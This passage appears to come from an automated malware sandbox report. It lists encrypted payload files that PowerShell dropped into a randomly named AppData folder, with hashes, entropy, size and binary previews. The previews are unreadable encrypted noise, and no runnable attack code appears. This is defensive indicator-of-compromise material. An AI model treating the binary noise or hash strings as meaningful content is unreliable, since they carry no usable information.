.8p........0O.B^^...D/.}O.E..e..o.<.K.....?6O...]0.;..t..]..{/=h.".E&Ak...W......4.....[s......b.d.......+...ps^94.Zx}..`."...jC.C..8dN4.J....$-;...q.?.o.....8t.,....{U....I...E...XT.;...\...H/......6...-.%..l.i.K./...........K9}(.Z...WO...+L.e.$y....F#&."..i....8..v...ij.\|d6..{8..\u..,..k.=........+..@...Z..rN.sn...IF2.l-........T....n....w.i.(..C..{M.o#7..........Ra.V..WbYK.s......mT+.z68..F}.....qhG...+...B....C..w.@...P..=.x#.Cn..]......_.m9..g?{..)R..90...t..:P..CD.'.QR...\|-9..~D....r?HV...dWqN`8E<.h.S`..`.R.j...sa...H....=....o.BB.@d.+U.........p.s."....Y_U.y...N.3.`S\|j....i..

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\phxvjqKWoNTLX.RzKQvdiISluOcBCT Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	74368
Entropy (8bit):	7.997471005496697
Encrypted:	true
SSDEEP:	1536:yrWT8U0Z9TDgeTf8QHNeqNxGdEIIjPskS+ZunhlpYjSdxUCKH2SS2vPqfCcm:yyT8UgTDpTfsSG6IIgYun3pMS/U3Wov1
MD5:	3E72E97F857D002656A78F975D6D097B
SHA1:	E01E4E88918866F5976C396B49911915090B9622
SHA-256:	A1971F1D41C4017D0B6BDEB4E5C436BF35D3A7640F93F86FA64BCAE257EB74AF
SHA-512:	EDADC0397ADC38DC94A8477BA15D1A03391723CC2A65BD07E3A6763EE835FE9C5C526586852F95C572204602B8F1FBA6B29E25717FE760B260D7755A66BF4A4B
Malicious:	true
Reputation:	unknown
Preview:	....>..gZ{f)..-.'.f....~ ...\|..0..!....i..U.].3.Sy.dx>..R..........F.2Ym..f-...(,..l.*..JxR.!.q.'.GG...7..v\.j...=,.R._B...`5..2P._.......cS6n.R...}.Eo....f..xD...&..YW..H..h.....(._0.i.>F.@....+s.,F..%...s.>..X.O.........PZ..<,......FP....G..Q.....pN.v....b4..3v....ey..0.....u`...q.i(...{...u.q..../>.........DN_..:....W2..VC?4[..S..g_\|.....&&k.sco{w.x..U...=c....>'.....u.../..?.&p(.O..'.jF.C..+[-.Wt.r.&u.cT<.y...@..v;..G....qP..R4;bE-....P.E..>>..s......."....m.&.....h...@....g.[......5.[..L..w"].....y#d..+/..P..n.G.A....2....&.Q..i..vY.W.,....4.M..P2.....:V...hH..8.uEBO...6 ......<...P.]#.(.>.B.Cm..=......&...><`L..$......Wp.d...;j....~.,.n.2.......K..K...G_(......}..t.e.89..Q......RT..Ex6-....%.37v..&.X..S....Q...Y.~...n8.).....`.>...v.`:_A......#.R.'............'...`kY.-......i2...!/...cik.=..?m..?........n.;...j.C]..8.C......@v...">.I>.`.~.K....i../......Aw....{}GH&.K......K..Q.....ggH9...G..v.D..C.i....COzH..b.................

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\pmEYyfzLTRHax.NhZgMmKLveYRXbWEjai Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	150370
Entropy (8bit):	7.998646029387463
Encrypted:	true
SSDEEP:	3072:+VHgwEgloKZqtdT6qpdUHCxacn2ikjPDp50TsJGEXmtxebW:+VAXKgtIq3W+B2bbNqThE4x9
MD5:	70A4D81DDD2C1175D6DE0D005DE1F05F
SHA1:	F70E9151AE358A5BA9D736ED88C00B17383C20EB
SHA-256:	F6B9BBDA234A45BF2B7DD3902CA619DE14B25DCCFAB36773E9B80FC9670E1D28
SHA-512:	0B936A4F9AF85C7883C8B6CDB1AC9638D21981A32CC96A2CAD96B6B2E7F46E67B5684142DDF24F8DA67812952AB1D4ED1AE62458D792A88C6BC9E1FE72693BDD
Malicious:	true
Reputation:	unknown
Preview:	..#..a.....]...............L>w...+0...y.. M....3...%sI3$.d.qF.....W...........;.D..}u....<8.a&.y.".y."y.xkc..Z.R...U..p.O........K......?\|V=.._$.$R.I........v.r...Wu.......4.:.....7.g..v.`..zo....X.1U...... .....l..U.x+.J.......>.....F....F...r......).jG.KD.Z..I..v..A...K....c.....Gn(L..N.d....d..DD...g.o..e.#G..9fs..r>.4.....g+..V...K...a.p.........q....z:...:.&...`....F...L.9.Q...>.J.36'.\+O.zy].^(xu..D..I....k[...zlWuWk..V/..X.7.[ew.x.;..&\|.......f..!......wO$......d.1;..E.N.<.....Cm..\.r>....H/8;4.(X.K.W.5..+..g......<..C..?.....!.........HJ.Uny`...f.oc...ng...:.3.s@.mA...W.D<.q.(9..V4.g;'a....EE....$p.n...+.v.\....?UJ..r=q.<a..w.0...M.%U.=....8..0..y.......X.+5..xG.+.......yR.."l.t.)...........B.`.,.h..y.C&.Adf50\....?.........7:7...f......x.....'mv.60Y..w:..L.-.?...?.M{%..ir:........r..-7b8..qY..<.&.r)5...M;=N..<9l........B^.%.r..C.'[...J.......8.u. .K.?..=..F*....M.. ...E."...m.P.X.....(osh.nZ..4.7:..h^.........2}..Y..Yb+...

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\pxcFHmkvrqbeUsT.gvfihVCLUBGKR Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	136818
Entropy (8bit):	7.998555626892838
Encrypted:	true
SSDEEP:	3072:7jZZkUA1Yag+aAFgA8Y9F5bD0uoU3WLayoah7lJT9bMJimiffS7O+L:fZ+03+ZKJY9FKzU3WLUah7lzbMAmifUR
MD5:	13B58A937174D9A096A55B6234CE6DF4
SHA1:	BE86DB65C2EAE09BF500A00F566D5E0FB1B0FDDF
SHA-256:	8D47B482DC138550E60919DAAC55CDD7FC7B5E285574422AAAC75D0980581E1A
SHA-512:	022823E4C412E2170B7DA36F5A12069EF474F12796F28EEC58217477D31CD953D0262047731F0E0AD905D732B89EDB6B12A99E1C1B7C60DDF0CCD59E59BE9F4D
Malicious:	true
Reputation:	unknown
Preview:	..gj(C&.....M..Qi.I.....(F."..U.....Z..VM.O.....@V.>..A....t.(1.;........Q..:i..-.....d..IM[.X.o....fc.b....;..6._cET.AZ^.&y.Wrh.6B......z6..t.9..Y7.i..kb}t<..l.L.Q<..t.&..E..w.:s9..!I.;.7....'..C.l.[.A.E../N.].1!....ASt.=3.x......E.v...?.I.\|....)J..Q......H.r.~...[>.Nh.........x.....3y......F......$..7#.W^..B@B...........f,7....@{..@m..N.....o.........U.. ......G..)4..p.D`.W.L.:.b..p.S<~.-.4.A.....}m....\....sb..}w........./\........q....(...Q...T$.Ci>...]}.blr..p.{._?.&.>...p.I.mH=.....CQ~.r]CU5+)........0.......[....Sh......nTE...{ ...\|.oD\|..X.b";s..'t03.....(..\|..N+.o.a+.$a..."..!.S.....h.\|S.....B....\.I$..........z..........N.r.B.b]w..a....}........q0r)K..W......?Py.U;..b..%..C......,.....}.b.te......c.b.%....I..Q..K.\x..>.\|&.h...&0..^.7..k.3.I..Rn{HG.B%..y..2.("..v...i..$r...x.P._..1.hv...Uy........m....6.....p.D...>..>.D.<...UNp5r{.?.".X.p...D..`.f.u,...E1/.z.wb..%.......wj.Q\|..E...5.&hU`...v,a...1...B.].....2..U.S

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\qIXwcOsVyj.jOtChBHvxi Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	140799
Entropy (8bit):	7.998526925167724
Encrypted:	true
SSDEEP:	3072:IXvmZzT6HLyV1zW1OGBSRwP6b9EH9ILp1sRhKKl2OMJLVNQAqdoksdY:IfGXYmV1zpTwAyMHeKZO0fQAqCFY
MD5:	F8FD7BDD9E49E9274718DF6235667EC4
SHA1:	A81B1BF2F51526A093C1973E820B016B5F80BF18
SHA-256:	2A9703908B28E504C5561D3ECA87B048067E73A3687D13A51676D52544BECA1B
SHA-512:	94A44DE97C42FDDCF947E34234D043740F078F9C8F2A68CB0619C347821BF3A6E5FA83E9F3770FE1FC338C29625531D36CCCB11CAFAE2BFE6F3D47D4FCE59AF0
Malicious:	true
Reputation:	unknown
Preview:	...$..'.m..N.~^.P..T.UqBZ.8z...U......(.........k..G...l...a..w.....)>.n..W.&Q.}yj.Y.._.9.H.2.C.._r..HB......pxY.2G...w.(....;.....1(.P3B.=L...O...F.....'.m...\...9...X{5..2{%.....I....h...3...5....V.4........4....\|<..{u..._A....[.\..v<.T[O.9...`...!..xO.aU%...WC........%..e.d%o(.9...Z..\|/.~..?x&...[..RO.U...a..e9..!<K%I....-%=x..&.'..B^e../).25..S..I..\'.[./.........B.....jj....D...Kr.....6..O....I...c.T....O...A.G.^.N.~....AJ..?...x...K.%:..Q.=.{....,n0..Y..T.[..zBo.U...D....V~.%..3...o;..@...a..=.]...y.U5g...`..8.M..eI^..h.?.@.....s.......O..i.xvpBK....ro...&..I..-....lqNl%g.[,.O.:.)(..'.g..L.D....,.n;mL.&.d\.~..{.,....R .".x......+n....U6..I...,....M..W..o0......mo0..j.R.{....h.x....9H....)..........E...j.........#.5....).l.]mY.U...7...w..b>..i.a..'...4.....N....@.epz.!...,...#.........8"7... .#R;[..-.........\....:.lg_K8.o.@.\d........{<..G..... .(.F.\..7.{&...J..)W...W..Yp.$;.z#.;.C\|Y2...j..1...`..........w.='..1n..X....

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\qiDnMGoScBvX.QhuXRaSIftGlyCYmsT Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	165023
Entropy (8bit):	7.9989116154901145
Encrypted:	true
SSDEEP:	3072:YvGZ1uXQjISoqX3Ax7vCXOdLnkELRQyZ2DIy96EUBYMMthFByveWaxs:Yo16Qj7osukyyyZ2DIy96EUBY4es
MD5:	6FC93F302E2E20ED75992FA5E6A67E4D
SHA1:	F03876D13322DBB836A78B01E9024D0269CD7946
SHA-256:	CF8F43070E1543C16EF13DCEF9E44B0DAC7DB8C51304A9C9E59C37898F04024E
SHA-512:	1DB72813DD1C55803D73AC28BB2DE8633686CAD6BA5D147035B719E0D398B57505D7F6DAF3B065E0C93148084918B3D4418B293682E176E080D30095A3A12AA8
Malicious:	true
Reputation:	unknown
Preview:	.r..A.u1......T..\.....zg....=d.!\|.Kd...Y.A..`H...\.....z...j"\|X.27.C.^.td.Mx..b..K....BG.).h..7...Y.zm._.@....r.i.0PX.[..YZu.....cH..B...3..7..WvI.v..9.d.!....`<.....&tRF$../p..m.i9/...Ex..{6..J.2_.B..;.....:...o.y.r.......<%4m;.g......x..Pn?..QU..~.....e....k....3th4..H.O....{"`:...y..<..Q...f.KK..........,.I../..[.........m/.0..H.Wxc.......q.%....'..u;.I.R=.....V]pr.8'Y.....@v.@v....P;.){{....9.%h..8Xt.f.w...J..h. 6....::....QK<....M5.W.i..B......1...[.:U..du....\|.N.`.]B(D......K.#..Rw..L...?W32,m......2.BV....)....)[;...J=.......0I.%j.....{Y..HGSC.k..{8lJ.~.,"...;L.n..k..>....{.DZh. ."...Q.\.......9...1=i.x.....%..).p4......&...._ ...Z.u].N.t...E..t.......a.J.....QFTDR..)...._p..V.....W>.......9%v...Xy....I.o.R.........W.<....\|..q...q.....N..H..NN.-.<........{s\|.....,.........<....4x..........hN:."./.u..6..u.......$ .M. g.\..X.].........g}9.7Y....h...J.{.s.7&.. ..RZ.-....`......W.....I:.JE..T8......U...Q...}x...w....$o.~.O'..V....

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\rHJzGlqjNpQbB.XioWZzQuAyDKhwep Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	136778
Entropy (8bit):	7.99846104765394
Encrypted:	true
SSDEEP:	3072:Cod5DTrmuy2zs9eRHzBFNIQJiDzghcDd+k4w3Cdh42:CoPrm9f94zBbHiY2D73K42
MD5:	475E2FE0C89C2C9A2CCE3D0BDD8B3BB4
SHA1:	B74C1E9FB7A87D5B6BB857F9B7030DAABB96A676
SHA-256:	013281C7AA4F75C8C1F142563B856FEC11305313C938F8AABE4CF4DC71B56909
SHA-512:	A2DE816A6F4FC7607B5929EE287F5FF56832D7CEE4440541A4DCE05F0A1A058D65B59F14E7B3F683485D9F6585E0B5B9E80D63F98E990B7EA9D6957544D2F085
Malicious:	true
Reputation:	unknown
Preview:	.FB3...U'..c...$..fH.x.\|....I.../!.Ch8.Y ..6};.!z.G.&6..32].Y..;.......B......i..@.Y...[..5..].....K..7..F.y...A...iz....%....(3....Aup !-.....<.i....\|T2...-.F..ZF...~..GM4D.....'Xy..=...q.S...+9......73G....%aX....o....S...3.j.9:lq.h...y.-.T...p0,...&..`....'..3MR..%..!p.J..bn:..>.J..v&Y.`$.j7#...0...K.."H....a8.....\|..2.\V....P.V.:BE.b-\|......X/..P...$..N.5..YV....k[..H\|9.......cH6.)=......\l.!..1J.K.....>z(o.Z.q..f..bU.R..j.)....;.8.n.X~..N.x_.$..d...~.G.s.q.?.^.V...{..L..T'..22K./...l....9V......e...k.a. ...?.6.....`..P..Y.&..7_.s+.a)..}ly.....&.&.H...X....!}....:.}A.._......R.)......Q..J.!...o...}!...>.:-..k.....+.._?bw...X.jD]...4..\|i..zm.Q...3}.\|..h.@.5..eK..$1K..3c..... ,iV6........4..!.#...J.....s....k.....&H..^...6....F....3...X..0+\.....^"....}.c...O...B....q'.f..?'.6Qx.&....8.]s.$..2.......Q.-'>..hV..\.8Cvs...m.x.*..##6t.9.Qy..G..P.^$L..`..\|...V...wD .."U..b@.%...........J..k...5`..A[)c...E;..p......#..9J^.N......V.j.,\|I....

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\rLuwaWktsvQ.xerluYTsdHpVNwoi Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	91424
Entropy (8bit):	7.998151399034058
Encrypted:	true
SSDEEP:	1536:p2FhHIy8McOL09I0n+mM/vmMYJIoCVUkj8r72J3C8LOjE44aolHVyQ:AI1OL0GvmQmSh866jE44t
MD5:	BE1C7243D7F62B6E36E40982E37B6733
SHA1:	EF44C84C8024110B5DBBA52FE85D275FD48EBAE5
SHA-256:	33BFA86BA26BD289A93A45A62705044F26511740685EE53F384860873E20FA24
SHA-512:	B347D06DDB402F4910BD8C477906CFC0956CF869C777348E4EB3348AF949F9CA709B569F93AEA760C3E054036AA9AD762AE4C305761E1C148D38A8AAE5766AF0
Malicious:	true
Reputation:	unknown
Preview:	...i..8.v.6.p.of..R.b........ `G(<~.2.0..c...-...2.n.W...N~.DCVw.l4}R39m..../..-Q..z.2.b.v6.\|..T...R^O..w..X7.a...Gh..:P.=...N..!3,B..b..5Z.+<..........C....UMy..\|5....s..............r.@....G.....I.....x..=S....cs....g..`t...m\|....;.....9..7.;..\|.?......e...99..'_.z.cH..<0.)..n}....&..ySMe....?./..T...5..v....s....f...\=....No...K.._^..._X.B.A.`....i.t......."..'..T.;..y....s_Z.._zB;..}a..w...M2.W.3.;B...AE-Fq..X.~..h..Jw.pA....?..G.@73q....l.?.c...^.g.....&}(.mXj7.x0Sj.C..F{.......b!0..cG....A........#JmHY...B..H.Z...zx.K.F.-..cL;.....i.^...>Yq...'..y)h...y..h+...5K!@].c\|....9......r...g.....G..oA..g.......,@.r.w....9..2.^......_-.6v.[...y:P.. @..../q...-8'v..bW.]..E>....8b.....%6.A......@...<..]3..:..}.R..a./..~.......$....n...oo)2.AM\.<Wn...-.....<..0....!.ea.[....p.H.R......8.v8........%..9.@.o#.`.;L.3...U.-k{.>..u$....-...Q}.s.).x.p$t.T.8..`Q.sR.../a.%..O..{Vh.Ad.\}...G@..5.....y...s.PS%8&B......e...!......OQ^..F...-M..!..

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\rOIMjvtmUnckFxXKRdi.rJvLTgNKCDF Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	88788
Entropy (8bit):	7.997799586664926
Encrypted:	true
SSDEEP:	1536:YNUlnv2j08hZmyQz0EBwn7TrefJrYtTPII1AJs96mTcA:YulIhZ8YEBELefJrYtSOBT9
MD5:	315A693907FA3E856486639CF7FFF137
SHA1:	F8D270036C53DF29210229A13BB5472D31377A20
SHA-256:	A7E484E3574940EF05A1B08EAA04C8CACA0D7B3A90981E1A353D999E9B670746
SHA-512:	6FEB562161B4EF688CC3466EFA6DE5E5F49268AFCB98BA9DF51429E1A19AAE27A14CBDD7AD0D96CB7910F8200A3DBB585C5417ABA72457AED3EAA1E9B29EDB09
Malicious:	true
Reputation:	unknown
Preview:	.-..8.%....../?..^Ra.....~.........S...:.O...D..IVG..~a...]...A.xh..eE&.G.Z......h....P.?./g........A./t..$u.V4l.Q.....&9.k..i.,..Y'.P7.\|..{....Eq....Q...8......:.n{.p.#......o..%...7.?...-.s"....bH.P?z&5.oH;...hc..../n.X.u(.}..<..pX...K........I.[.....<..P..;.......t\|..9?.....^.a....../..o$.Ai.\|..Lz.:..?.I..lF..v...D..Z.\|D...G..d.b.M.Kb.^<.{.........$..q...W....W^@.x].U.....].....O=9..p .,/Q[..w...gQ............b.%...<f(.Zky...o..L..!8....us.h.~]..._..}D...=..G4......"8..Q.e...+01.q.7.,..CK.E.?....e....f..........n...Z1.4#..&0@.f...N.1b..YH9..j\|.T.8J;..C.E..W_....0.......kc......._ ...u.F...._K...-..=..X+.%k.}.....j.....m...^.4. S.`j...8..K.+.t.....X..zB..p.}7.]1...YM...@w^..F...;!.4v....<^x..=..O@.....*...<6../Y........\|[..<.>A......Utt..v..t..tE....8.e...p....EC..+G.n/.4...<........;.WvBDy..1..I..7...).J.....Y.?\...I......Q9.<...n...<....ut.R..(Y>.?..H%.XG.......[g.K..Bm.F...\|/.....H...v..Uk..y.`..0.=a..q..W9.M..g..5..

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\rSOHCVZlYftcv.UeLDJVTvnGt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	102927
Entropy (8bit):	7.998167730674872
Encrypted:	true
SSDEEP:	3072:Xi1oU2ktjMxJrwGNrgQc6HuEcCewAeHfO4lC:Xe2k5Mx/kQccuVCewL/g
MD5:	46BE5D1B899D2E5EC3A8742F4973DFF1
SHA1:	A7C6AB513E82CC33B8D9FAA31D5A6A9537D7D666
SHA-256:	F84CAF2DC0F1B97F015D6CBDDCB764ECCC156D4EB9F13D2A45C2CF5C522AD9E4
SHA-512:	A965892CBE7772406B6D51F0B8FB9795A5BC7CFDCDBE55514C5A13934E62E5B298AB72860D4CCE63950C004255C4059DE46328CC6D3C9053C6A418B3E004AFFA
Malicious:	true
Reputation:	unknown
Preview:	F..<C.p.......^...<..2..'....p..R.7Q..g..[....z.L....&.... .Uu.o.&....... .X....=......P..,.Y.v.N.S.?.6....Z..0.s.)........+~.'.......d.A..}....+....=...).X....O..7._u-g......Q..V....z.z.;..a..#..t..&z<.2g.?...-h.Txe0LO:"~.....=....cd..G...l..X!.bcND.{.X.n.h.2...........~..m.+.r..N..v....7..WkD4....w1....Q............X..I).t...b.....h......_.>F$..3..\..&Z(.......B~...4o...W..nO3...q...s......l.$L....Ju<..P..=b.....#;....bkh..].k.j...`B4....CHfGL.o...m.......#.?^....[...5......!\|..k.....w8_...d.n1O..R..>;#...kJ......z.%a..d,w.p..,/.OZ.{KF..2..<...s.........>^p.?..N.^.@4.{..e'\|...!IW.n^..^9.oK..r!.wY8.e.A1.\...J.Nz..z.n ..m0l....9..-..<.<.j.q$.sn..M....]...U.i....!.2;=T..c>Ij..i.h...X...<E.{.t.R.W..1.......]...v%....l?...:.......X...:..q..+{Ms....."/?.Z....b.....$..X.Z&c..R1....&wI^..W1...0">./....G....$..`.x.t.F.\|7PO...AF/"b.. ....b..3)-.5..w.[..6..C....u..x.dz.3.>."..&!..a.....).\.O.\cw>D.....DO.....!.a.....d.........ln.F..4`....)C.q.^$

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\rUwfTjdykcCLzouDaS.GugaDRhMsfYFJwNL Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	131264
Entropy (8bit):	7.99863201495285
Encrypted:	true
SSDEEP:	3072:PuU0A9g9NrRtcn7lGrW5e8GrfYWjDc/psnqv0hnOMpJcu4WOFbo2J3oQ:PukqNrRG74P8Ug6Dc/psnHnOM8u5IF3t
MD5:	37A122079EC5C9E06F014B12848DB0F2
SHA1:	3805973BF17865EF45BDE3EDF96462010D1FF23C
SHA-256:	90936779431EC800E0ED793747C3F6CDC3E01A48E6D4D6EAD08B14BC529CDB4A
SHA-512:	4A735FD27604BDE634E3B03DE89ECC60FB01099F0A09F1E8ABD1733F5784A2BEF1F0E410118BBBB706B50C160A0F1C5CAC0FBE09619C8B7D922C78A612E859EB
Malicious:	true
Reputation:	unknown
Preview:	g...:VRF.i..:.l..].j.9......M..Y...".k/.&,....\|..._.W.-j}.tA....e9..]..Rg...O:.e...Z..T.V....-4h...jp'nl3.. j-...L04T.d.FU.......~.....T...{..v7.t......$.n.V.I2G..'...f.Ri.jA.+.1...c..j2..L.Hc....n...f...-*...oP,6L=\\;..!6Ry.hW.;..r.UM..zl.....gvXQ...p.dS^.A.W.N.z.9..W.b..bA....2)......\Q8.F.p>M...g..!\|n.......W`$......F.......<.Rr..n.z....{v..K^.(.xoh...F....n^..,.&...........q.>.(..........z...1...b`....Fhk%.0d....QF&58...d...r..&..q.....xl.......q..,'.Bz.I&V.w1...Nm\|.N....I3O..xS<.5k..K.P.i!sSm.H..+..lZo\..G1B&.;..a/.!a/.-.X..f.?.M.J...D.R..kBC..S....A..,..+..+.....o.d....3.X...n...Cn..)@.4..hJ..&.....:...A{z..q.[.N.i.K;.o......q.p......Cl.......hcQ.Q.F........"..o`.D.N..s..5.8B_.S.V.Rj.Av.....x.......6.._.g.jm.C.f..+Q....M....#.Q.....fdF.k.<_E.DY...2.Ud...o..KY{.w..oq.oW.;^]....&)..~q>>j.......z0.i....m..F...1$/....H0...U.t{y.I..Gm....W8.;.G.V......9.........._.....J.7.7QaP..u0. &....JJ..+..f.l.).Cx...%v..W...8......c.......-L]-...!`

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\rgAUvnByWkDjZae.bTudVpkxJmvyGQYEnlg Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	108352
Entropy (8bit):	7.998313173527326
Encrypted:	true
SSDEEP:	3072:khPSybQUa4iUjl7LZ6nE2DAfbGMG3/jV6U:khKUQPUjl7LknE2DRMArVL
MD5:	63CF709A6A76719B4C2AC2396A96A77F
SHA1:	2419BD296117BA3FC6B6A1B369F8550CD4202CBD
SHA-256:	D4E307D9EF14051085B1ED7F990739CD5EF6C30B0A6EA906F36EFE4003108884
SHA-512:	D70DC7A45141BA6A144AADCD033F4D6FCA15947F3FECAA9DBC58EDCB1FB211816C4CFBE389205268984881B6F8BEA224ECF4063DF52C4C1D4685EBCB6B8275E0
Malicious:	true
Reputation:	unknown
Preview:	.i..O.H..Q........?.U...,D.ZG.H.:.....g.n.&y+^.........9:..:.....u#...]\|...&....-.f[../....,.d'z..:1.Dvd.,.........D...J.v......K....9.r#p..Q.. ./5..o^..=.....xr...B+...6........;]..s.V.4....v...p.J.n9.U`7...E.z..ih/..P5....e.g_..[.9........r...)..4L8..VH..Eu.....Y.h\|.G7$.8...3>W/...Q...j..G.i.....G.......,....z..2....}d.nl$?........=...=..}..>..\|..5.p..oa..;.Hf..:............r.1...J.Y.<P.+..9.....aR..~..zSE.....A.~...Y..h......P..24..~..j.Y.J...d....e...SQm..0%...."..s.p....Y.mr..1.&...H.....$U..GB0..U.VQF..a.R..#f`.......F.rv..ZA....YY N22s....9#2...>.n.U.};qo'.~?....'w..\|7.Kp...(i..4#.......K.1.ck.v..3.7u.d...G.2..U.M...o.....$........J.!.[.{...(.....K.qK.......K....&..=^....Y...>.p....k.........t$..3.zk/.D...i....a..IW.W.:..UV&.e.:.d.&.;$y&B......dP^.W).-@.Kd...O.wNg;..$..1.EWFp...>.t.....H..<...~(;..z....C..\|........U..eR9.QrvB..a..h..T....+t:+.....;.Q'o=......."..6.R./..C...F.0.R.%.6@\..4.L......d..M.....b(..<..8..:Q@..n.+

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\sACZoIEWXwbMxLhiuz.hxfOedlAVNjnFabGcuB Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	56822
Entropy (8bit):	7.996134905867653
Encrypted:	true
SSDEEP:	1536:RJ8WUcVrliXlOCM54jIdA0ni1v/BMYOvVbHB:D8WTrOi4N0n4ZqvFHB
MD5:	0B05263AFF4CCD7D819D648671A8EF69
SHA1:	E9275C8D07B6544E7E0202175C3DE1F785B235B2
SHA-256:	AFC607CD490D078FC3770B5B34EBDAE85B9E4785433B366AAC75978B59A1C6D5
SHA-512:	10F50020E878B44B973DEE1084E40BFFF9AB04E003B08358C55B81A01B340B2CF65FEB3689B3E36753257DCA473E4056096F9AC87FE78193240E76CD1BDB23B4
Malicious:	true
Reputation:	unknown
Preview:	...G.(......}.u..M..@5.,..D.3.oZ.6.T..0K....C.9TM...u.y#\|....g..G. ...V.nC..W.....pXj.s1z.%f.+sy.PID3Z..C6..U......a...x....C......i...A=...1.7j...C....f.BN'.B4.i...C..Q.a....)>F.P....A.Jg.{.5......k.6&Y6'.}.....<...?lJ.....\.@..\|...T.1W(l...R.Z.. TLjs..l.....J(.%.:o..y....P.yn.`].&8..uu.......q.........k.'.Ju49.../......"..lb.r.{.;-D....g_.._......1..^HjcP..N.k....k.0...........q....L....>e:..V.......F...t....h...o.......\..\|H;..."UI.......~..D...O....K(...L.,.d7....PJ..E_.ua..B.7.2..5..=.R.N.K,.hJ..m.=.[.a...G,b5.G..]..0~.5...gx..oZ....g.!...k.{.C.nI..6X+.`.....eu..L..J]...y.\|.S.....#.`..ue..Y..-.{rK.q.;C.VZu.B+...Q.p.....I....w:.!....b^..H..,ZY..............a.....iN.2m.K...R=.....D.e..........3d.J]W...@#,t..:.....[sU....C......x1.GU..A..!...e...r=..Y.....Dv.......7......l.L=<.t.f..)/Q72....:y..3moR~D",6>.g2.E_..Bs ..A..hZ&....G..v".".u......z%./7J..R....s^.n.v......x0.b......c~G.pF.p..1a.N.<.C.^:..".y.......8K..z..95D

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\sPrBLOdoVUbWAZJcg.pIlSNOWbiKfFGRn Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	140795
Entropy (8bit):	7.998761691992461
Encrypted:	true
SSDEEP:	3072:EAJdu1bDtXZobWSgI7CSbzGcgW0JBSXu6VGzgF4A4tYKL0iH:EvXtWCSbz2swkf4NVH
MD5:	343E0D3648C409AA21C536BB413B297E
SHA1:	5E719A42597F686445D1D51E91D6E65AAE79F741
SHA-256:	43EFF1E06A8BA8EA4A7F3753E85D4FE8A3CDA894F79BF14567198CBA14121BCF
SHA-512:	066933E81B7DB1B86CAAF8591BB4E6E3864C661AD7DEBAEB52D07ABEEC0A4D1CA3A6358A00429928BB21DC5F1F55140978DA7C2751C77140A41CA4A31255D54A
Malicious:	true
Reputation:	unknown
Preview:	......M_.[..I..`;..%....0t.L..`0acQ\|9Q.).-Q....b.B......M?.1...Z7..Y......KY...(."..X\.M.I..._a~Y.N. F..A....=HPwn\.......>...........G.tkQ.....L...:.s....1:.p..<...f.].......=.......;...e9..q.Q.<..4_.]..r._Y.7..u.e.....p..n......c~.7vQ...L..I..t....:.U.FB.....8hu'!>5....e..........(..0.8%..OJ...R....+]G.1x...7..:.LV.&..f..<.....6G......j/O..X.EGM.v..}{.........t. ...>M.6_.......D.&9.JY+.&;.xd.M.(7L#F.......W$@...G.^."..$.V..Z.0.` U..D._F......jz...RZ6..d(U..&].f........@....:.z{.65.....y......J%;..,..O.....]..b.^.1.....C\|...T.Y..-.O.j.>(). .....Z].]+.0..O0.^.ie..\|.\l.J...'.....A?G.1x.)..n...d....F..Dp....#..'%pJK@.C........w....ps....[....s..J...J;.'z.1.....,....]...~...5.:-B.b.4.gFK..\..=mG....`K.;;......}..+\|.BTC.'.C...DT.qm.r..~V.>...j@^B.`.t\|N$.g#.8..3T..@.v...\|.p..pyJx.$..z......v.kB[...T..v.z.p.u...O..W...&...]..kQ.[.$.5....!._.`+'E\.<}Xb{& .X..kN#>b.........R.~\|6H...].^.......;..D......n]..+........_.......N_.X.79.&h..." ......-..

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\sWCqhOzyjm.RtZjPKhvlYIb Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	67943
Entropy (8bit):	7.997458735790444
Encrypted:	true
SSDEEP:	1536:3HfLP7KQQzNgKsJPcknYEKBUk/PN/54f5JgMULfDudo:TP7K7NgKsJ0mqN/PNCfQLruq
MD5:	021E8D62E76F82A60C7EA16F167D5A21
SHA1:	85121774708085CA77B06B826505102AB43B2FC9
